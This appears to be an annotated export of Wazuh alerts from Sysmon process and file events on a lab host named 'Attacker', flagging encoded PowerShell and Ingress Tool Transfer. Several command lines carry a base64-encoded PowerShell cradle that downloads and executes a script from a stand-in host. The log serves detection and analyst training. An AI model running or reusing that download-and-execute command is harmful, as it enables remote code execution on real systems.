data.win.system.systemTime: 2025-04-24T22:56:33.9223709Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350867 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:33.902
ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ProcessId: 10052
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mhldo5qe.xqb.ps1
CreationUtcTime: 2025-04-24 22:56:33.902
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:33.902 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mhldo5qe.xqb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:33.902 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 132 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535400.2880028 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:38.1224674Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350907 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:35.370
ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ProcessId: 3616
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ParentProcessId: 10052
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:35.370 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a3-680a-010d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 136 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535400.2888095 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:38.6009870Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350913 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:38.564
ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ProcessId: 3616
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_alhca2xx.ivy.ps1
CreationUtcTime: 2025-04-24 22:56:38.561
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:38.564 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a3-680a-010d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_alhca2xx.ivy.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:38.561 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 133 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535403.2890860 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:41.3926518Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350943 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:39.935
ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ProcessId: 12292
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ParentProcessId: 3616
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:39.935 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a7-680a-040d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 137 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535404.2898927 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:41.7268408Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350944 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:41.676
ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ProcessId: 12292
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kteidnpa.tvp.ps1
CreationUtcTime: 2025-04-24 22:56:41.676
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:41.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a7-680a-040d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kteidnpa.tvp.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:41.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 134 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535407.2901696 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
